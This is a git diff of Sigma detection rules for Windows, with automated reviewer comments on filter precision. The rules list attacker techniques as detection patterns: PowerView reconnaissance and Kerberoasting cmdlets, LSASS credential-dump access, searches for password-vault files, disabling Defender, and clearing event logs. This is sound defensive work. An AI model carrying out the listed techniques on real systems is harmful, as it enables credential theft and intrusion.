'\AppData\Local\Microsoft\OneDrive\' condition: selection and not 1 of filter_* falsepositives: - Other legitimate processes loading those DLLs in your environment. diff --git a/rules/windows/image_load/image_load_wsman_provider_image_load.yml b/rules/windows/image_load/image_load_wsman_provider_image_load.yml index 1ce9ae1f7..846ebbbbb 100644 --- a/rules/windows/image_load/image_load_wsman_provider_image_load.yml +++ b/rules/windows/image_load/image_load_wsman_provider_image_load.yml 
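Review bot: The two new `filter_end` entries `'\procexp64.exe'` and `'\procexp.exe'` are bare file-name suffixes with no path or parent constraint, which is the weakest form of exclusion in this rule; every other added entry (`SysWOW64`, `SystemSettings.exe`, `explorer.exe`, Teams, OneDrive) is anchored to a full path or a `C:\Users\` prefix. If a fixed deployment location is not available, at least list these tools under `falsepositives` so the exclusion is documented. The rearrangement of `explorer.exe` from `filter_start` into `filter_full` and the stricter OneDrive filter are improvements.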
@@ -3,7 +3,7 @@ id: ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94 description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution. status: experimental date: 2020/06/24 -modified: 2022/07/18 +modified: 2022/09/18 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.execution @@ -55,6 +55,8 @@ detection: Image|startswith: 'C:\Windows\Temp\asgard2-agent\' filter_citrix: Image|startswith: 'C:\Program Files\Citrix\' + filter_ps_ise: + Image|endswith: '\powershell_ise.exe' svchost: Image|endswith: '\svchost.exe' commandline_null: diff --git a/rules/windows/network_connection/net_connection_win_python.yml b/rules/windows/network_connection/net_connection_win_python.yml index 5e0ec8245..bebc55259 100644 --- a/rules/windows/network_connection/net_connection_win_python.yml +++ b/rules/windows/network_connection/net_connection_win_python.yml @@ -7,7 +7,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python - https://pypi.org/project/scapy/ date: 2021/12/10 -modified: 2022/08/12 +modified: 2022/09/20 logsource: category: network_connection product: windows 
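Review bot: `filter_ps_ise` uses `Image|endswith: '\powershell_ise.exe'`, so any file with that name in any directory is excluded, whereas the neighbouring `filter_citrix` and the asgard2 filter are anchored to an install path. Pinning it to the system copies, `Image: - 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe' - 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe'`, keeps the false-positive fix while preserving the rule's intent. The `condition` that consumes these filters lies outside the hunk, so I am assuming it is a `1 of filter_*` style exclusion.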
@@ -15,7 +15,23 @@ detection: selection: Initiated: 'true' Image|contains: python - condition: selection + filter_conda: + # Related to anaconda updates. Command example: "conda update conda" + # This filter will only work with aurora agent enriched data as Sysmon EID 3 doesn't contain CommandLine nor ParentImage + ParentImage: C:\ProgramData\Anaconda3\Scripts\conda.exe + CommandLine|contains|all: + - 'C:\ProgramData\Anaconda3\Scripts\conda-script.py' + - 'update' + filter_conda_jupyter_notebook: + # Related to anaconda opening an instance of Jupyter Notebook + # This filter will only work with aurora agent enriched data as Sysmon EID 3 doesn't contain CommandLine nor ParentImage + ParentImage: C:\ProgramData\Anaconda3\python.exe + CommandLine|contains: 'C:\ProgramData\Anaconda3\Scripts\jupyter-notebook-script.py' + filter_local_communication: + # This could be caused when launching an instance of Jupyter Notebook locally for example but can also be caused by other instances of python openning sockets locally etc. So comment this out if you want to monitor for those instances + DestinationIp: 127.0.0.1 + SourceIp: 127.0.0.1 + condition: selection and not 1 of filter_* falsepositives: - Legitimate python script level: medium diff --git a/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml b/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml index 89a6e4bf1..7612f4a7b 100644 --- a/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml +++ b/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml @@ -9,7 +9,7 @@ references: - https://www.ietf.org/rfc/rfc2821.txt author: frack113 date: 2022/01/07 -modified: 2022/02/16 +modified: 2022/09/21 logsource: category: network_connection product: windows 
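Review bot: `filter_local_communication` matches only the IPv4 loopback pair, so a loopback connection logged with `::1` on either side still alerts; if that is not intended, make the values lists: `DestinationIp: ['127.0.0.1', '::1']` and `SourceIp: ['127.0.0.1', '::1']`. The two conda filters depend on `ParentImage`/`CommandLine`, which the comments correctly note plain Sysmon EID 3 lacks, so on un-enriched data they never match — worth stating that the rule then falls back to `selection and not filter_local_communication`. Minor: the comment reads "openning" for "opening".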
@@ -27,7 +27,10 @@ detection: - \outlook.exe filter_mailserver: Image|startswith: 'C:\Program Files\Microsoft\Exchange Server\' - condition: selection and not 1 of filter* + filter_outlook: + Image|startswith: 'C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_' + Image|endswith: '\HxTsr.exe' + condition: selection and not 1 of filter_* falsepositives: - Other SMTP tools level: medium diff --git a/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml b/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml index 2c87f50da..0df871e90 100755 --- a/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml +++ b/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml 
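Review bot: The condition changes from `1 of filter*` to `1 of filter_*`, which silently drops any filter whose name lacks the underscore; the visible ones (`filter_mailserver`, `filter_outlook`) are fine, but the start of the `detection` block is outside the hunk, so please confirm no earlier `filter...` key loses effect. `filter_outlook` pairing `Image|startswith` on the `WindowsApps\microsoft.windowscommunicationsapps_` package with `Image|endswith: '\HxTsr.exe'` is a well-scoped exclusion.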
@@ -4,36 +4,36 @@ status: test description: Detects programs with network connections running in suspicious files system locations author: Florian Roth, Tim Shelton references: - - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo + - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo date: 2017/03/19 modified: 2022/05/26 logsource: - category: network_connection - product: windows - definition: 'Use the following config to generate the necessary Event ID 3 Network Connection events' + category: network_connection + product: windows + definition: 'Use the following config to generate the necessary Event ID 3 Network Connection events' detection: - selection: - - Image|contains: + selection: + - Image|contains: # - '\ProgramData\' # too many false positives, e.g. with Webex for Windows - - '\Users\All Users\' - - '\Users\Default\' - - '\Users\Public\' - - '\Users\Contacts\' - - '\Users\Searches\' - - '\config\systemprofile\' - - '\Windows\Fonts\' - - '\Windows\IME\' - - '\Windows\addins\' - - Image|endswith: - - '\$Recycle.bin' - - Image|startswith: - - 'C:\Perflogs\' - false_positive1: - Image|startswith: 'C:\Users\Public\IBM\ClientSolutions\Start_Programs\' # IBM Client Solutions Default Location - condition: selection and not 1 of false_positive* + - '\Users\All Users\' + - '\Users\Default\' + - '\Users\Public\' + - '\Users\Contacts\' + - '\Users\Searches\' + - '\config\systemprofile\' + - '\Windows\Fonts\' + - '\Windows\IME\' + - '\Windows\addins\' + - Image|endswith: + - '\$Recycle.bin' + - Image|startswith: + - 'C:\Perflogs\' + false_positive1: + Image|startswith: 'C:\Users\Public\IBM\ClientSolutions\Start_Programs\' # IBM Client Solutions Default Location + condition: selection and not 1 of false_positive* falsepositives: - - Unknown + - Unknown level: high tags: - - attack.command_and_control - - attack.t1105 + - attack.command_and_control + - attack.t1105 
diff --git a/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml b/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml index 5a47a8919..3677db9fd 100644 --- a/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml +++ b/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml @@ -56,5 +56,5 @@ detection: - '\MsFteWds' condition: 1 of selection_malleable_profile* and not filter falsepositives: - - Chrome instances using the exactly same name pipe named mojo.something + - Chrome instances using the exact same pipe name "mojo.something" level: high diff --git a/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml index 3fc16fea8..3f7989312 100644 --- a/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml @@ -3,10 +3,10 @@ id: 64e8e417-c19a-475a-8d19-98ea705394cc description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe status: test date: 2019/08/11 -modified: 2022/04/21 +modified: 2022/09/20 author: Roberto Rodriguez @Cyb3rWard0g references: - - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html + - https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html tags: - attack.execution - attack.t1059.001 
@@ -25,9 +25,13 @@ detection: ContextInfo|contains: 'C:\Windows\system32\dsac.exe' filter_winrm: ContextInfo|contains: 'C:\Windows\system32\wsmprovhost.exe -Embedding' + filter_help_update: + Payload|contains: + - 'Update-Help' + - 'Failed to update Help for the module' condition: selection and not 1 of filter* falsepositives: - Programs using PowerShell directly without invocation of a dedicated interpreter - MSP Detection Searcher - Citrix ConfigSync.ps1 -level: medium \ No newline at end of file +level: medium diff --git a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml new file mode 100644 index 000000000..6acd74a7f --- /dev/null +++ b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml @@ -0,0 +1,26 @@ +title: Powershell Add Name Resolution Policy Table Rule +id: 4368354e-1797-463c-bc39-a309effbe8d7 +status: experimental +description: Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace. This will bypass the default DNS server and uses a specified server for answering the query. +references: + - https://twitter.com/NathanMcNulty/status/1569497348841287681 + - https://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps +author: Borna Talebi +date: 2021/09/14 +logsource: + product: windows + category: ps_script + definition: Script Block Logging must be enabled +detection: + selection: + ScriptBlockText|contains|all: + - 'Add-DnsClientNrptRule' + - '-Namesp' + - '-NameSe' + condition: selection +tags: + - attack.impact + - attack.t1565 +falsepositives: + - Unknown +level: high diff --git a/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml b/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml new file mode 100644 index 000000000..df3121e56 --- /dev/null 
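Review bot: `filter_help_update` excludes events purely on `Payload` content (`Update-Help`, `Failed to update Help for the module`), and the payload is whatever the script or host chose to run, so any alternate PowerShell host whose payload happens to contain one of these strings is no longer reported. The sibling filters in this rule (`filter_winrm`, the dsac one above it) anchor on `ContextInfo`, i.e. on the host process; pair the new filter with the `ContextInfo|contains: '<host path that produced the FP>'` that triggered the false positive so that the exclusion stays tied to a known host rather than to script text.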
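Review bot: `date: 2021/09/14` in the new `posh_ps_add_dnsclient_rule.yml` looks inconsistent with the rule's references (a `windowsserver2022-ps` docs page and a Twitter status whose ID is in the September 2022 range) and with the other rules added in this commit, which are dated September 2022; it is probably a typo for `date: 2022/09/14`, please confirm. The three `contains|all` fragments (`Add-DnsClientNrptRule`, `-Namesp`, `-NameSe`) are truncated on purpose to catch abbreviated parameter names; a short comment saying so would save the next reader from "fixing" them.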
+++ b/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml @@ -0,0 +1,36 @@ +title: Disable-WindowsOptionalFeature Command PowerShell +id: 99c4658d-2c5e-4d87-828d-7c066ca537c3 +status: experimental +author: frack113 +date: 2022/09/10 +description: | + Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. + Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images +references: + - https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md + - https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps +tags: + - attack.defense_evasion + - attack.t1562.001 +logsource: + product: windows + category: ps_script + definition: Script block logging must be enabled +detection: + selection_cmd: + ScriptBlockText|contains|all: + - 'Disable-WindowsOptionalFeature' + - '-Online' + - '-FeatureName' + selection_feature: + # Add any important windows features + ScriptBlockText|contains: + - 'Windows-Defender-Gui' + - 'Windows-Defender-Features' + - 'Windows-Defender' + - 'Windows-Defender-ApplicationGuard' + #- 'Containers-DisposableClientVM' # Windows Sandbox + condition: all of selection* +falsepositives: + - Unknown +level: high diff --git a/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml b/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml new file mode 100644 index 000000000..c37b1dd75 --- /dev/null +++ b/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml 
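Review bot: In `selection_feature`, `'Windows-Defender'` is a substring of `'Windows-Defender-Gui'`, `'Windows-Defender-Features'` and `'Windows-Defender-ApplicationGuard'`, and the modifier is `contains`, so the three longer entries can never add a match the short one does not already produce. Either keep only `'Windows-Defender'` with a comment that it covers all Defender feature names, or, if the intent is to enumerate exact feature names, that needs a different modifier than `contains`. The `# Add any important windows features` comment would read better as a pointer to that choice.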
@@ -0,0 +1,33 @@ +title: Enable-WindowsOptionalFeature Command PowerShell +id: 55c925c1-7195-426b-a136-a9396800e29b +status: experimental +author: frack113 +date: 2022/09/10 +description: | + Detect built in PowerShell cmdlet Enable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. + Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images +references: + - https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps +tags: + - attack.defense_evasion +logsource: + product: windows + category: ps_script + definition: Script block logging must be enabled +detection: + selection_cmd: + ScriptBlockText|contains|all: + - 'Enable-WindowsOptionalFeature' + - '-Online' + - '-FeatureName' + selection_feature: + # Add any unsecure windows features + ScriptBlockText|contains: + - 'TelnetServer' + - 'Internet-Explorer-Optional-amd64' + - 'TFTP' + - 'SMB1Protocol' + condition: all of selection* +falsepositives: + - Unknown +level: medium diff --git a/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml b/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml index 332337938..12701d630 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml 
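Review bot: The `tags` list carries only the tactic `attack.defense_evasion` with no technique ID, whereas the sibling `Disable-WindowsOptionalFeature` rule added in the same commit tags `attack.t1562.001`; enabling legacy features such as `SMB1Protocol` or `TelnetServer` is not obviously defense evasion, so pick the technique that fits and add it, or drop the tactic if none does. The `# Add any unsecure windows features` comment should read "insecure".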
@@ -18,131 +18,131 @@ logsource: category: ps_script definition: Script Block Logging must be enabled detection: - selection: - ScriptBlockText|contains: - - Export-PowerViewCSV - - Get-IPAddress - - Resolve-IPAddress - - Convert-NameToSid - - ConvertTo-SID - - Convert-ADName - - ConvertFrom-UACValue - - Add-RemoteConnection - - Remove-RemoteConnection - - Invoke-UserImpersonation - - Invoke-RevertToSelf - - Request-SPNTicket - - Get-DomainSPNTicket - - Invoke-Kerberoast - - Get-PathAcl - - Get-DNSZone - - Get-DomainDNSZone - - Get-DNSRecord - - Get-DomainDNSRecord - - Get-NetDomain - - Get-Domain - - Get-NetDomainController - - Get-DomainController - - Get-NetForest - - Get-Forest - - Get-NetForestDomain - - Get-ForestDomain - - Get-NetForestCatalog - - Get-ForestGlobalCatalog - - Find-DomainObjectPropertyOutlier - - Get-NetUser - - Get-DomainUser - - New-DomainUser - - Set-DomainUserPassword - - Get-UserEvent - - Get-DomainUserEvent - - Get-NetComputer - - Get-DomainComputer - - Get-ADObject - - Get-DomainObject - - Set-ADObject - - Set-DomainObject - - Get-ObjectAcl - - Get-DomainObjectAcl - - Add-ObjectAcl - - Add-DomainObjectAcl - - Invoke-ACLScanner - - Find-InterestingDomainAcl - - Get-NetOU - - Get-DomainOU - - Get-NetSite - - Get-DomainSite - - Get-NetSubnet - - Get-DomainSubnet - - Get-DomainSID - - Get-NetGroup - - Get-DomainGroup - - New-DomainGroup - - Find-ManagedSecurityGroups - - Get-DomainManagedSecurityGroup - - Get-NetGroupMember - - Get-DomainGroupMember - - Add-DomainGroupMember - - Get-NetFileServer - - Get-DomainFileServer - - Get-DFSshare - - Get-DomainDFSShare - - Get-NetGPO - - Get-DomainGPO - - Get-NetGPOGroup - - Get-DomainGPOLocalGroup - - Find-GPOLocation - - Get-DomainGPOUserLocalGroupMapping - - Find-GPOComputerAdmin - - Get-DomainGPOComputerLocalGroupMapping - - Get-DomainPolicy - - Get-NetLocalGroup - - Get-NetLocalGroupMember - - Get-NetShare - - Get-NetLoggedon - - Get-NetSession - - Get-LoggedOnLocal - - Get-RegLoggedOn - - 
Get-NetRDPSession - - Invoke-CheckLocalAdminAccess - - Test-AdminAccess - - Get-SiteName - - Get-NetComputerSiteName - - Get-Proxy - - Get-WMIRegProxy - - Get-LastLoggedOn - - Get-WMIRegLastLoggedOn - - Get-CachedRDPConnection - - Get-WMIRegCachedRDPConnection - - Get-RegistryMountedDrive - - Get-WMIRegMountedDrive - - Get-NetProcess - - Get-WMIProcess - - Find-InterestingFile - - Invoke-UserHunter - - Find-DomainUserLocation - - Invoke-ProcessHunter - - Find-DomainProcess - - Invoke-EventHunter - - Find-DomainUserEvent - - Invoke-ShareFinder - - Find-DomainShare - - Invoke-FileFinder - - Find-InterestingDomainShareFile - - Find-LocalAdminAccess - - Invoke-EnumerateLocalAdmin - - Find-DomainLocalGroupMember - - Get-NetDomainTrust - - Get-DomainTrust - - Get-NetForestTrust - - Get-ForestTrust - - Find-ForeignUser - - Get-DomainForeignUser - - Find-ForeignGroup - - Get-DomainForeignGroupMember - - Invoke-MapDomainTrust - - Get-DomainTrustMapping - condition: selection + selection: + ScriptBlockText|contains: + - Export-PowerViewCSV + - Get-IPAddress + - Resolve-IPAddress + - Convert-NameToSid + - ConvertTo-SID + - Convert-ADName + - ConvertFrom-UACValue + - Add-RemoteConnection + - Remove-RemoteConnection + - Invoke-UserImpersonation + - Invoke-RevertToSelf + - Request-SPNTicket + - Get-DomainSPNTicket + - Invoke-Kerberoast + - Get-PathAcl + - Get-DNSZone + - Get-DomainDNSZone + - Get-DNSRecord + - Get-DomainDNSRecord + - Get-NetDomain + - Get-Domain + - Get-NetDomainController + - Get-DomainController + - Get-NetForest + - Get-Forest + - Get-NetForestDomain + - Get-ForestDomain + - Get-NetForestCatalog + - Get-ForestGlobalCatalog + - Find-DomainObjectPropertyOutlier + - Get-NetUser + - Get-DomainUser + - New-DomainUser + - Set-DomainUserPassword + - Get-UserEvent + - Get-DomainUserEvent + - Get-NetComputer + - Get-DomainComputer + - Get-ADObject + - Get-DomainObject + - Set-ADObject + - Set-DomainObject + - Get-ObjectAcl + - Get-DomainObjectAcl + - Add-ObjectAcl + - 
Add-DomainObjectAcl + - Invoke-ACLScanner + - Find-InterestingDomainAcl + - Get-NetOU + - Get-DomainOU + - Get-NetSite + - Get-DomainSite + - Get-NetSubnet + - Get-DomainSubnet + - Get-DomainSID + - Get-NetGroup + - Get-DomainGroup + - New-DomainGroup + - Find-ManagedSecurityGroups + - Get-DomainManagedSecurityGroup + - Get-NetGroupMember + - Get-DomainGroupMember + - Add-DomainGroupMember + - Get-NetFileServer + - Get-DomainFileServer + - Get-DFSshare + - Get-DomainDFSShare + - Get-NetGPO + - Get-DomainGPO + - Get-NetGPOGroup + - Get-DomainGPOLocalGroup + - Find-GPOLocation + - Get-DomainGPOUserLocalGroupMapping + - Find-GPOComputerAdmin + - Get-DomainGPOComputerLocalGroupMapping + - Get-DomainPolicy + - Get-NetLocalGroup + - Get-NetLocalGroupMember + - Get-NetShare + - Get-NetLoggedon + - Get-NetSession + - Get-LoggedOnLocal + - Get-RegLoggedOn + - Get-NetRDPSession + - Invoke-CheckLocalAdminAccess + - Test-AdminAccess + - Get-SiteName + - Get-NetComputerSiteName + - Get-Proxy + - Get-WMIRegProxy + - Get-LastLoggedOn + - Get-WMIRegLastLoggedOn + - Get-CachedRDPConnection + - Get-WMIRegCachedRDPConnection + - Get-RegistryMountedDrive + - Get-WMIRegMountedDrive + - Get-NetProcess + - Get-WMIProcess + - Find-InterestingFile + - Invoke-UserHunter + - Find-DomainUserLocation + - Invoke-ProcessHunter + - Find-DomainProcess + - Invoke-EventHunter + - Find-DomainUserEvent + - Invoke-ShareFinder + - Find-DomainShare + - Invoke-FileFinder + - Find-InterestingDomainShareFile + - Find-LocalAdminAccess + - Invoke-EnumerateLocalAdmin + - Find-DomainLocalGroupMember + - Get-NetDomainTrust + - Get-DomainTrust + - Get-NetForestTrust + - Get-ForestTrust + - Find-ForeignUser + - Get-DomainForeignUser + - Find-ForeignGroup + - Get-DomainForeignGroupMember + - Invoke-MapDomainTrust + - Get-DomainTrustMapping + condition: selection falsepositives: - Should not be any as administrators do not use this tool level: high 
diff --git a/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml b/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml index f450b9dee..d7f20b484 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml @@ -9,15 +9,17 @@ references: - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2 - https://www.ietf.org/rfc/rfc2821.txt author: frack113 -date: 2022/01/07 +date: 2022/09/26 logsource: product: windows category: ps_script definition: Script block logging must be enabled detection: - selection_cmdlet: - ScriptBlockText|contains: Send-MailMessage - condition: selection_cmdlet + selection: + ScriptBlockText|contains: 'Send-MailMessage' + filter: + ScriptBlockText|contains: 'CmdletsToExport' + condition: selection and not filter falsepositives: - Legitimate script level: medium diff --git a/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml b/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml new file mode 100644 index 000000000..5815a0ca6 --- /dev/null +++ b/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml 
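Review bot: This hunk rewrites `date: 2022/01/07` to `date: 2022/09/26` instead of adding a `modified:` field; `date` records when the rule was created, and every other edited rule in this commit bumps `modified:` rather than `date`. The change should be `date: 2022/01/07` kept and `modified: 2022/09/26` added on the next line. The new `filter` on `CmdletsToExport` (module manifests listing the cmdlet) is a sensible exclusion, but a one-line comment naming that reason would make it self-explanatory.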
@@ -0,0 +1,35 @@ +title: Powershell Sensitive File Discovery +id: 7d416556-6502-45b2-9bad-9d2f05f38997 +related: + - id: d23f2ba5-9da0-4463-8908-8ee47f614bb9 + type: derived +description: Detect adversaries enumerate sensitive files +references: + - https://twitter.com/malmoeb/status/1570814999370801158 +status: experimental +author: frack113 +date: 2022/09/16 +logsource: + product: windows + category: ps_script + definition: Script block logging must be enabled +detection: + selection_action: + ScriptBlockText|contains: + - ls + - get-childitem + - gci + selection_recurse: + ScriptBlockText|contains: '-recurse' + selection_file: + ScriptBlockText|contains: + - '.pass' + - '.kdbx' + - '.kdb' + condition: all of selection_* +falsepositives: + - Unknown +level: medium +tags: + - attack.discovery + - attack.t1083 diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml new file mode 100644 index 000000000..49a838e80 --- /dev/null +++ b/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml 
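Review bot: `selection_action` includes the bare substring `ls`, which occurs inside ordinary tokens such as `false`, `tools` or `Utils`, so that selection is satisfied by almost any script block and the rule effectively reduces to `-recurse` plus one of the extension strings. Anchoring the alias with surrounding whitespace, `- ' ls '`, or keeping only `get-childitem` and `gci`, makes `selection_action` discriminate again, at the cost of missing a script block that opens with `ls`. The `.pass` entry is likewise a prefix of unrelated names (`.passed`, for instance), so the `falsepositives: Unknown` entry understates the expected noise; a short note on why those three extensions were chosen would help tuning.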
@@ -0,0 +1,31 @@ +title: Suspicious Eventlog Clear +id: 0f017df3-8f5a-414f-ad6b-24aff1128278 +related: + - id: cc36992a-4671-4f21-a91d-6c2b72a2edf5 + type: derived +description: Detects usage of known powershell cmdlets such as "Clear-EventLog" to clear the windows event logs +references: + - https://twitter.com/oroneequalsone/status/1568432028361830402 + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md + - https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html +status: experimental +author: Nasreddine Bencherchali +date: 2022/09/12 +logsource: + product: windows + category: ps_script + definition: Script block logging must be enabled +detection: + selection: + ScriptBlockText|contains: + - 'Clear-EventLog ' + - 'Remove-EventLog ' + - 'Limit-EventLog ' + - 'Clear-WinEvent ' + condition: selection +falsepositives: + - Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate +level: medium +tags: + - attack.defense_evasion + - attack.t1070.001 diff --git a/rules/windows/powershell/powershell_script/posh_ps_web_request.yml b/rules/windows/powershell/powershell_script/posh_ps_web_request.yml index e344a07ee..3b73fd598 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_web_request.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_web_request.yml @@ -10,7 +10,7 @@ references: - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell author: James Pemberton / @4A616D6573 date: 2019/10/24 -modified: 2021/10/16 +modified: 2022/09/26 tags: - attack.execution - attack.t1059.001 
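Review bot: Every entry in `selection` ends with a trailing space (`'Clear-EventLog '`, `'Remove-EventLog '`, `'Limit-EventLog '`, `'Clear-WinEvent '`), so a cmdlet that closes the line or is followed by a tab, newline or backtick continuation is not matched. Because the modifier is already `contains`, dropping the trailing space loses little precision; if the space is there to avoid matching longer cmdlet names, say so in an inline comment so it is not removed later. The `falsepositives` sentence would read better as `Rare need to clear logs before doing something; sometimes used by installers or cleaner scripts. Investigate the script to determine whether it is legitimate`.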
@@ -27,7 +27,9 @@ detection: - 'curl ' - 'Net.WebClient' - 'Start-BitsTransfer' - condition: selection + filter: + Path|startswith: 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\' + condition: selection and not filter falsepositives: - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer. level: medium diff --git a/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml b/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml index ab575a468..b322595a4 100755 --- a/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml +++ b/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml @@ -5,7 +5,7 @@ description: Detects process access LSASS memory which is typical for credential author: Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community (update) date: 2017/02/16 -modified: 2022/07/05 +modified: 2022/09/13 references: - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html @@ -119,6 +119,9 @@ detection: filter_webex: SourceImage|endswith: '\AppData\Local\WebEx\WebexHost.exe' GrantedAccess: '0x401' + filter_malwarebytes: + SourceImage: 'C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\ctlrupdate\mbupdatr.exe' + GrantedAccess: '0x1410' # Old - too broad filter # SourceImage|endswith: # easy to bypass. need to implement supportive rule to detect bypass attempts # - '\wmiprvse.exe' diff --git a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml index c449009b1..30041efde 100755 --- a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml 
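Review bot: The new `filter` excludes every script block whose `Path` sits under the Azure Guest Configuration plugin folder, but `falsepositives` still names only the Get-Command/Get-Help case, and the filter carries the generic name `filter` while the other rules in this commit use descriptive names. Renaming it `filter_azure_guestconfig` and adding `- Azure Guest Configuration extension scripts` under `falsepositives` records why the exclusion exists. The `selection` list this hunk extends starts above the hunk, so the full set of download keywords is not visible here.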
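Review bot: `filter_malwarebytes` trusts an image path under `C:\PROGRAMDATA`, a location that is writable by non-administrators on a default install, so the exclusion is guarded only by the exact path plus the `GrantedAccess: '0x1410'` pairing; the same trade-off applies to the `\AppData\Local\` paths in `falsepositive7` and `falsepositive10` of the NtOpenProcess rule and to the `\JetBrains\Toolbox\bin\jetbrains-toolbox.exe` entries added to the two LSASS rules that follow. The process_access source offers no signer field to tighten on, so at least record the decision inline, e.g. `# ProgramData is user-writable; exclusion rests on the exact path + 0x1410 pairing`, and keep the full path rather than a suffix match. Sigma matches strings case-insensitively by default, so the upper-case spelling works, but writing the path in its on-disk case reads consistently with the rest of the file. The enclosing `detection` block begins and ends outside the hunk.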
